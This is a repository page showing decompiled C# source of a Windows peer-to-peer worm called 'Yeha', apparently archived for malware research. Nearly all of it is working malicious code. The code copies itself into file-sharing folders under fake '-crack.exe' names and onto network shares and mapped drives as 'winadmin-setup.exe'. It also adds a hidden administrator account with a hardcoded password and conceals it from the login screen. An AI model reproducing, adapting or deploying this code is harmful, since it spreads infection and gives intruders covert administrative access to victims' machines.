daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-17 00:09:23 +00:00
Code Issues Projects Releases Wiki Activity
Files
f2ac1ece553baae244e7129a9292251a663ee06c
MalwareSourceCode/MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.Small.e-0002cd4f65b1b756ba4657ed24d7b4c902f3ebdd96744e8c85544abf0344954e/Yeha.cs
T
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

135 lines
4.8 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: Yeha.Yeha
// Assembly: Yeha, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 17833E27-DE2E-4DC9-A82C-D7D503ADE440
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.MSIL.Small.e-0002cd4f65b1b756ba4657ed24d7b4c902f3ebdd96744e8c85544abf0344954e.exe
using Microsoft.Win32;
using System;
using System.Collections;
using System.Diagnostics;
using System.DirectoryServices;
using System.IO;
using System.Management;
namespace Yeha
{
internal class Yeha
{
private string me = Convert.ToString(Process.GetCurrentProcess().MainModule.FileName);
public bool chkIt()
{
if ((string) Registry.GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Yeha", nameof (Yeha), (object) nameof (Yeha)) == nameof (Yeha))
return true;
Registry.LocalMachine.OpenSubKey("Software", true).CreateSubKey(nameof (Yeha)).SetValue(nameof (Yeha), (object) this.me);
return false;
}
public void p2p()
{
foreach (object obj in new ArrayList()
{
(object) (Environment.GetFolderPath(Environment.SpecialFolder.Personal) + "\\Downloads"),
(object) (Environment.GetFolderPath(Environment.SpecialFolder.Personal) + "\\My Shared Folder"),
(object) (Environment.GetFolderPath(Environment.SpecialFolder.Personal) + "\\Shared"),
(object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Ares\\My Shared Folder"),
(object) (Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + "\\Downloads"),
(object) (Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + "\\Shareaza\\Downloads")
})
{
string path = Convert.ToString(obj);
if (Directory.Exists(path))
{
foreach (string directory in Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles)))
File.Copy(this.me, path + "\\" + directory.Substring(directory.LastIndexOf("\\")).Replace("\\", string.Empty) + "-crack.exe", true);
}
}
}
public void YehaUser()
{
try
{
DirectoryEntry directoryEntry1 = new DirectoryEntry("WinNT://" + Environment.MachineName + ",computer");
DirectoryEntry directoryEntry2 = directoryEntry1.Children.Add(nameof (Yeha), "user");
directoryEntry2.Invoke("SetPassword", (object) "yehawashere");
directoryEntry2.CommitChanges();
directoryEntry1.Children.Find("Administrators", "group")?.Invoke("Add", (object) directoryEntry2.Path.ToString());
try
{
Registry.SetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", nameof (Yeha), (object) 0, RegistryValueKind.DWord);
}
catch (Exception ex)
{
}
}
catch (Exception ex)
{
}
}
public void Share()
{
try
{
foreach (ManagementBaseObject managementBaseObject in new ManagementObjectSearcher("select * from win32_share").Get())
{
string str = Convert.ToString(managementBaseObject["Name"]);
if (!str.Contains("$"))
File.Copy(this.me, "\\\\" + Environment.MachineName + "\\" + str + "\\winadmin-setup.exe", true);
}
}
catch (Exception ex)
{
}
Exception exception;
try
{
string name = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Map Network Drive MRU\\";
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(name);
foreach (string valueName in registryKey.GetValueNames())
{
string str = registryKey.GetValue(valueName).ToString();
if (valueName.ToLower() != "mrulist")
{
try
{
File.Copy(this.me, str + "\\\\winadmin-setup.exe", true);
}
catch (Exception ex)
{
exception = ex;
}
}
}
registryKey.Close();
}
catch (Exception ex)
{
exception = ex;
}
}
public void CreateShare(string dir, string name)
{
try
{
Directory.CreateDirectory(dir);
ManagementClass managementClass = new ManagementClass("Win32_Share");
ManagementBaseObject methodParameters = managementClass.GetMethodParameters("Create");
methodParameters["Description"] = (object) name;
methodParameters["Name"] = (object) name;
methodParameters["Path"] = (object) dir;
methodParameters["Type"] = (object) 0;
if ((uint) managementClass.InvokeMethod("Create", methodParameters, (InvokeMethodOptions) null).Properties["ReturnValue"].Value != 0U || !Directory.Exists(dir))
return;
new DirectoryInfo(dir).Attributes = FileAttributes.Hidden;
}
catch (Exception ex)
{
}
}
}
}
Reference in New Issue View Git Blame Copy Permalink